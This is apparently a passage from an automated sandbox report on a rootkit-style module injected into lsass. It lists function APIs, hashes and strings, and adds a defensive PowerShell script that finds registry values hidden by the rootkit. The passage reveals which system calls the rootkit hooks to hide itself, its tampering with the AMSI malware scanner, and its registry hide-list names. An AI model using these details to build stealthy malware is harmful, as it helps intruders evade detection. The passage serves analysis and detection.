                                                          Memory Dump Source: same as above (0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, offset 00000202C0AE0000, same five associated dumps)
                                                          Joe Sandbox IDA Plugin: same snapshot as above (hcaresult_10_2_202c0ae0000_lsass.jbxd)
                                                          Similarity
                                                          • API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
                                                          • String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
                                                          • API String ID: 1735320900-4225371247
                                                          • Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction ID: 08a2ebef705224ec87e7d243a31c2443f02d9759f98051242431abd315881b8a
                                                          • Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
                                                          • Instruction Fuzzy Hash: C8519DA1140B8AE5FB14EB65EDCCBDC2720F740788F824923976A06167DE79C66EC390

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source: same as above (0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, offset 00000202C0AE0000, same five associated dumps)
                                                          Joe Sandbox IDA Plugin: same snapshot as above (hcaresult_10_2_202c0ae0000_lsass.jbxd)
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProcSleep
                                                          • String ID: AmsiScanBuffer$amsi.dll
                                                          • API String ID: 188063004-3248079830
                                                          • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction ID: f734452340a7dcf9d4f5df38be3cb1e1e1483fd86ec87bb37f84f6ee3b727116
                                                          • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                                                          • Instruction Fuzzy Hash: ACD09E32611740D5FA1CAB21ECDC76C2261BF64F41FC70417C70E012A6DE3E895D8340

                                                          Control-flow Graph

                                                          APIs
                                                          • GetModuleFileNameW.KERNEL32 ref: 00000202C0AE3A35
                                                          • PathFindFileNameW.SHLWAPI ref: 00000202C0AE3A44
                                                            • Part of subcall function 00000202C0AE3F88: StrCmpNIW.SHLWAPI(?,?,?,00000202C0AE272F), ref: 00000202C0AE3FA0
                                                            • Part of subcall function 00000202C0AE3EC8: GetModuleHandleW.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3EDB
                                                            • Part of subcall function 00000202C0AE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F0E
                                                            • Part of subcall function 00000202C0AE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F2E
                                                            • Part of subcall function 00000202C0AE3EC8: GetCurrentProcess.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F47
                                                            • Part of subcall function 00000202C0AE3EC8: VirtualProtectEx.KERNEL32(?,?,?,?,?,00000202C0AE3A5B), ref: 00000202C0AE3F68
                                                          • CreateThread.KERNELBASE ref: 00000202C0AE3A8B
                                                            • Part of subcall function 00000202C0AE1E74: GetCurrentThread.KERNEL32 ref: 00000202C0AE1E7F
                                                            • Part of subcall function 00000202C0AE1E74: CreateThread.KERNELBASE ref: 00000202C0AE2043
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2049
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2055
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2061
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE206D
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2079
                                                            • Part of subcall function 00000202C0AE1E74: TlsAlloc.KERNEL32 ref: 00000202C0AE2085
                                                          Memory Dump Source: same as above (0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, offset 00000202C0AE0000, same five associated dumps)
                                                          Joe Sandbox IDA Plugin: same snapshot as above (hcaresult_10_2_202c0ae0000_lsass.jbxd)
                                                          Similarity
                                                          • API ID: Alloc$CurrentThread$CreateFileModuleNameProcessProtectVirtual$FindHandlePath
                                                          • String ID:
                                                          • API String ID: 2779030803-0
                                                          • Opcode ID: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction ID: d1958dc9e64c19f1a7617c4a24c7aaa22d2134b747b4393a871ac78407530116
                                                          • Opcode Fuzzy Hash: 6a579ca0c7c2c8c467e4d6158b23fada6777a03145598802ad2919fe2a24b2e1
                                                          • Instruction Fuzzy Hash: FB114C73618781C2FB64E720A5CD7AD2290AB54789F52412B97E6862D3EF7AC4AC8640
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: LibraryLoad
                                                          • String ID:
                                                          • API String ID: 1029625771-0
                                                          • Opcode ID: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction ID: 1be2c9892de14d5c1d5809facac573890b70df83cb34a6729bbc88fd12841374
                                                          • Opcode Fuzzy Hash: da5dba7eb06952aa6345e7caa7b696f440210d15dc911575dfa97e0e60fe5b6d
                                                          • Instruction Fuzzy Hash: 6991E273B05390C7EB648F29E48CB6DB395FB54B94F5682279F490778ADA38D81AC700

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00000202C0AE1724: GetProcessHeap.KERNEL32 ref: 00000202C0AE172F
                                                            • Part of subcall function 00000202C0AE1724: HeapAlloc.KERNEL32 ref: 00000202C0AE173E
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17AE
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE17DB
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE17F5
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1815
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.KERNELBASE ref: 00000202C0AE1830
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1850
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE186B
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE188B
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE18A6
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE18C6
                                                          • SleepEx.KERNELBASE ref: 00000202C0AE1BDF
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE18E1
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1901
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE191C
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE193C
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE1957
                                                            • Part of subcall function 00000202C0AE1724: RegOpenKeyExW.ADVAPI32 ref: 00000202C0AE1977
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE1992
                                                            • Part of subcall function 00000202C0AE1724: RegCloseKey.ADVAPI32 ref: 00000202C0AE199C
                                                          Memory Dump Source: same as above (0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, offset 00000202C0AE0000, same five associated dumps)
                                                          Joe Sandbox IDA Plugin: same snapshot as above (hcaresult_10_2_202c0ae0000_lsass.jbxd)
                                                          Similarity
                                                          • API ID: CloseOpen$Heap$AllocProcessSleep
                                                          • String ID:
                                                          • API String ID: 948135145-0
                                                          • Opcode ID: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction ID: 89b458e9973c9e425d56098a404ff8a4da767c7608af5d0e3aa3f1987bcdbbf9
                                                          • Opcode Fuzzy Hash: 04a7d6bb1a63501d3af889adb59d0fd65c45e2a3bb55e477ac55990fbc3a1c41
                                                          • Instruction Fuzzy Hash: 40311C752407A1C1FB549B26D9CC36D23A4EB84FC4F1654238FAAC7697EE24C8B8C214
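Two functions in this section read the sample's configuration from the registry. The earlier one carries the strings SOFTWARE\, nya-config, paths, pid, process_names, service_names, startup, tcp_local, tcp_remote and udp alongside Open/Close/Enum/QueryValue registry APIs, i.e. it opens a key and reads named values that look like the hide lists for paths, PIDs, process names, services and TCP/UDP endpoints. The function just above opens and closes a run of keys on either side of a SleepEx call, which is consistent with a polling loop that reloads that configuration (an inference from the call list, not something the report states). Since NtEnumerateKey and NtEnumerateValueKey are in the hook table but NtOpenKey and NtQueryValueKey are not, a live check can open the key by its exact name and read each value by name, then compare against what enumeration returns: anything readable by name but missing from the listing is the hook at work. The script below is an added example written for this page, not code from the report or from the sample. The key path SOFTWARE\nya-config under HKLM and HKCU is this example's assumption (the report shows the two fragments separately and confirms neither their concatenation nor the hive); the value names are copied verbatim from the report's string list.

```powershell
# Added example for this page; not code from the report or from the sample.
# Cross-view check for the sample's registry configuration. The key path is this example's
# assumption: the report shows the fragments 'SOFTWARE\' and 'nya-config' but not their
# concatenation or the hive. The value names are copied verbatim from the report's string list.
param([string]$SubKey = 'SOFTWARE\nya-config')

$ValueNames = 'paths','pid','process_names','service_names','startup','tcp_local','tcp_remote','udp'
$Hives = [ordered]@{
  HKLM = [Microsoft.Win32.Registry]::LocalMachine
  HKCU = [Microsoft.Win32.Registry]::CurrentUser
}

function Get-RootkitConfig {
  $parent = Split-Path $SubKey -Parent     # 'SOFTWARE'
  $leaf   = Split-Path $SubKey -Leaf       # 'nya-config'
  foreach ($hive in $Hives.GetEnumerator()) {
    # Opening the key by exact name goes through NtOpenKey, which is not in the hook table;
    # listing the parent's subkeys goes through NtEnumerateKey, which is.
    $key = $hive.Value.OpenSubKey($SubKey, $false)
    if (-not $key) { continue }
    $parentKey = $hive.Value.OpenSubKey($parent, $false)
    $keyListed = $parentKey -and ($parentKey.GetSubKeyNames() -contains $leaf)
    if ($parentKey) { $parentKey.Close() }
    $valuesListed = @($key.GetValueNames())   # RegEnumValue -> NtEnumerateValueKey (hooked)
    foreach ($name in $ValueNames) {
      $data = $key.GetValue($name)            # RegQueryValueEx -> NtQueryValueKey (not in the hook table)
      if ($null -eq $data) { continue }
      [pscustomobject]@{
        Key                 = "$($hive.Key)\$SubKey"
        Value               = $name
        Kind                = $key.GetValueKind($name)
        Data                = (@($data) -join '; ')
        KeyHiddenFromEnum   = -not $keyListed
        ValueHiddenFromEnum = -not ($valuesListed -contains $name)
      }
    }
    $key.Close()
  }
}

$findings = @(Get-RootkitConfig)
if ($findings.Count -eq 0) { "No $SubKey key with the expected value names under HKLM or HKCU" }
else { $findings | Format-Table -AutoSize -Wrap }
```

A row with KeyHiddenFromEnum or ValueHiddenFromEnum set to True is a direct indicator that the enumeration hooks are active in the process running the script. The check only holds as long as the hook table is the one the report shows; a variant that also hooks NtOpenKey or NtQueryValueKey would hide from it, so the authoritative step remains reading the SOFTWARE hive from an offline copy (reg save, or the file from a forensic image) where no user-mode hook can interfere.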

                                                          Control-flow Graph

[Graph of 202c0aed220-202c0aed294 not rendered; the executed/not-executed node colouring is lost. The function calls HeapAlloc and the subroutines 202c0aed1f4, 202c0af06d0 and 202c0aeb470.]
                                                          APIs
                                                          Memory Dump Source: same as above (0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, offset 00000202C0AE0000, same five associated dumps)
                                                          Joe Sandbox IDA Plugin: same snapshot as above (hcaresult_10_2_202c0ae0000_lsass.jbxd)
                                                          Similarity
                                                          • API ID: AllocHeap
                                                          • String ID:
                                                          • API String ID: 4292702814-0
                                                          • Opcode ID: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction ID: e1e6e0ac71898aeab69aabadab1461bc0982668d0686ebd3bc5e150eb7b2f4ab
                                                          • Opcode Fuzzy Hash: 065a3c227d1033dd624f9406cc348b017554f0f94b7651207c823ad3d34cd8d2
                                                          • Instruction Fuzzy Hash: E3F0B464302381C1FF99A7A299CC3ED12805F99B84F0E5433CFAA963C3ED2CC5AC8210

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                                          • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                                          • API String ID: 2119608203-3850299575
                                                          • Opcode ID: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction ID: a5aa8d518733a65e72782ac89f22c94750b1b62739d14810ddb664aeb1ab3f90
                                                          • Opcode Fuzzy Hash: 4d584b0e9fffbad4cc31b9baeef7d8a5c9f9b6ed13c09f6337f8d347bcf38d45
                                                          • Instruction Fuzzy Hash: 54B17B23218790C2FB688F26D48C7ADA3A4FB54B84F42501BEFA957796DE35CC68C340
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 3140674995-0
                                                          • Opcode ID: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction ID: 1fd1398fcb60db0fd12b5702c5cec2ec559b6403bb8f7bfd8953d4e0478874f3
                                                          • Opcode Fuzzy Hash: 51ce79795580dd11982ca28bc6e50e7f34313ca15137cb51b6721156f23fd73c
                                                          • Instruction Fuzzy Hash: 3A313872205B80CAEB648F60E8983EE6364F784744F45412BDB4E47B9AEF39C6588710
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                          • String ID:
                                                          • API String ID: 1239891234-0
                                                          • Opcode ID: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction ID: bdf96c80047f6ea7879b7296cb0b1e392bde7b83cf83d084ea18cef059749d5e
                                                          • Opcode Fuzzy Hash: 76c33bf84c009b7db417edaf83874ce51c27584cf70d0f0be3d694c1c6751581
                                                          • Instruction Fuzzy Hash: 88413B37214B80D6EB60CB25E88879E73A4F788798F510217EB9D47B9ADF39C559CB00
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFile$FirstNext
                                                          • String ID:
                                                          • API String ID: 1164774033-0
                                                          • Opcode ID: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction ID: 6cd45a926ae4f196c66121e0907c686aba8d01625abc602bf4e60f2acf2c76ac
                                                          • Opcode Fuzzy Hash: 30129107364e07a24944f029efc6e57ddf7bba8b8a305cfb4bfa64c3d4dd41e4
                                                          • Instruction Fuzzy Hash: 21A1C7227047C1C9FF20DB75A8CC3AD6BA1E781794F164117DFE92B69ADA38C469C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                          • String ID: d
                                                          • API String ID: 2005889112-2564639436
                                                          • Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction ID: 0346aae0ca31cfc5446ed893382cb8ac7576f5295399881bb2bb3007a05736cd
                                                          • Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
                                                          • Instruction Fuzzy Hash: E7515872600B84DAE724DF62E88C35EB7A1F788F99F464126DB8907759EF39C0598700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
                                                          • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                          • API String ID: 740688525-1880043860
                                                          • Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction ID: c9050c799cc8b24d351ecbc0e2456b50b0823dadf38651cf09021ade24b1e00f
                                                          • Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
                                                          • Instruction Fuzzy Hash: 7451B022701794D1FA249B66A88C7AD2290FB48BB0F4A07279FBD473D2EF38D55D8640

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Running Time
                                                          • API String ID: 1943346504-1805530042
                                                          • Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction ID: da826e7b8d6e7ca4cec740dbf7bba15f3c3c47d0d85c22e92d3f34e745d80f34
                                                          • Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
                                                          • Instruction Fuzzy Hash: 2E31F723604B81D6F721DF22A88C75DA3A0F788BC6F464627EF9943766DF38C4698340

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$CounterInfoProcess$AllocFree
                                                          • String ID: \GPU Engine(*)\Utilization Percentage
                                                          • API String ID: 1943346504-3507739905
                                                          • Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction ID: 863d4c81c0bb7533973f4be5efafb84a7b862018384b7cbbeae244933c129245
                                                          • Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
                                                          • Instruction Fuzzy Hash: 6C316B23614B81CAFB14DF26A8CC75DA3E0F784F95F4641279F9A43726EF38D8598600
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000003.2182941443.00000202C0AB0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000202C0AB0000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_3_202c0ab0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction ID: c8547640cb286afa299405946a8124958e51512830d2469bcbb3e32d4079da4f
                                                          • Opcode Fuzzy Hash: 99dcd42e55987f84e0a9dbea2fa1ae191c477915d496a4e3a9a042af50ac5220
                                                          • Instruction Fuzzy Hash: 9DD15932604B80CAFB609F6994CC3AD77A0F755798F12021BEB8957B9BDB38C599C704

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                          • String ID: csm$csm$csm
                                                          • API String ID: 849930591-393685449
                                                          • Opcode ID: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction ID: a8d0328bd7ace5f1ad4107d746fc22be05e34ce5d332c004736b100ae6b30142
                                                          • Opcode Fuzzy Hash: 037bd7d014dbf073bd717ac1516acd742bbf86a7991252edd6e45b1783c3a634
                                                          • Instruction Fuzzy Hash: 5DD17972604B80CAFB20DB65948C39D77A0F766788F160217EBE957B9BDB34D4A9C700

                                                          Control-flow Graph

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000A.00000002.2350538920.00000202C0AE1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000202C0AE0000, based on PE: true
                                                          • Associated: 0000000A.00000002.2349769408.00000202C0AE0000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2351411359.00000202C0AF5000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352197509.00000202C0B00000.00000004.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2352897380.00000202C0B02000.00000002.00000001.00020000.00000000.sdmp
                                                          • Associated: 0000000A.00000002.2353504211.00000202C0B09000.00000002.00000001.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_10_2_202c0ae0000_lsass.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                          • String ID: d
                                                          • API String ID: 3743429067-2564639436
                                                          • Opcode ID: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction ID: 12129625d553530f9360fb6b3d3905575b46989a33bec7f90b4e235278d54632
                                                          • Opcode Fuzzy Hash: 214df63eb12f5006524d9de65027155270ac54fbc8f89443ffbfb24959d92ecf
                                                          • Instruction Fuzzy Hash: 90417173214B84DAF760CF21E48879E77A1F388B98F45821ADB8907758DF39D459CB40

                                                          APIs
                                                          Strings
                                                          Memory Dump Source
